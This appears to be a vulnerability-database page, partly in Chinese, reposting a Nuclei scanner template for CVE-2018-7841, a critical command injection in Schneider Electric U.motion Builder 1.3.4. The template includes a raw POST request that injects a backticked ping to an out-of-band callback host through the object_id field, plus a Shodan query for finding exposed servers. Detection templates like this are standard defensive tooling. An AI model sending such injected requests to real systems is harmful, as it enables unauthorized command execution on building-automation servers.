CVE-2018-7841: Schneider Electric U.motion Builder - Remote Code Execution

日期: 2025-08-01 | 影响软件: Schneider Electric U.motion Builder | POC: 已公开

漏洞描述

U.motion Builder 1.3.4 contains a remote code execution vulnerability caused by improper input sanitization, allowing attackers to execute arbitrary system commands through crafted input parameters.

PoC代码[已公开]

id: CVE-2018-7841

info:
  name: Schneider Electric U.motion Builder - Remote Code Execution
  author: darses,rcesecurity
  severity: critical
  description: |
    U.motion Builder 1.3.4 contains a remote code execution vulnerability caused by improper input sanitization, allowing attackers to execute arbitrary system commands through crafted input parameters.
  impact: |
    Attackers can execute arbitrary system commands on the server, potentially leading to complete system compromise, data theft, service disruption, or lateral movement within the network.
  remediation: |
    The product has been retired and is no longer available or supported. To further protect their installations from this threat, customers should immediately remove the U.motion Builder software from their systems.
  reference:
    - https://www.exploit-db.com/exploits/46846
    - https://packetstorm.news/files/id/152862
    - https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day
    - https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2017-178-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2019-071-02-Umotion-Builder.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-7841
    cwe-id: CWE-78
    epss-score: 0.53349
    epss-percentile: 0.97854
    cpe: cpe:2.3:a:schneider-electric:u.motion_builder:1.3.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-requests: 1
    vendor: schneider-electric
    product: u.motion_builder
    shodan-query: http.headers_hash:1985490094
  tags: cve,cve2018,schneider-electric,rce,kev,oast,oob,vkev,vuln

variables:
  oast: "{{interactsh-url}}"

http:
  - raw:
      - |
        POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        op=export&language=english&interval=1&object_id=`ping -c 1 {{interactsh-url}}`

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(content_type, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 4a0a004730450220570bff2df4a02a38046fa636dcb87543d602f7590052d8df4cfabd5ea23563a0022100872238428b3a83723c6d821e61121b44490d9b27b5eba881f472b4cd42a45a41:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7841.yaml

相关漏洞推荐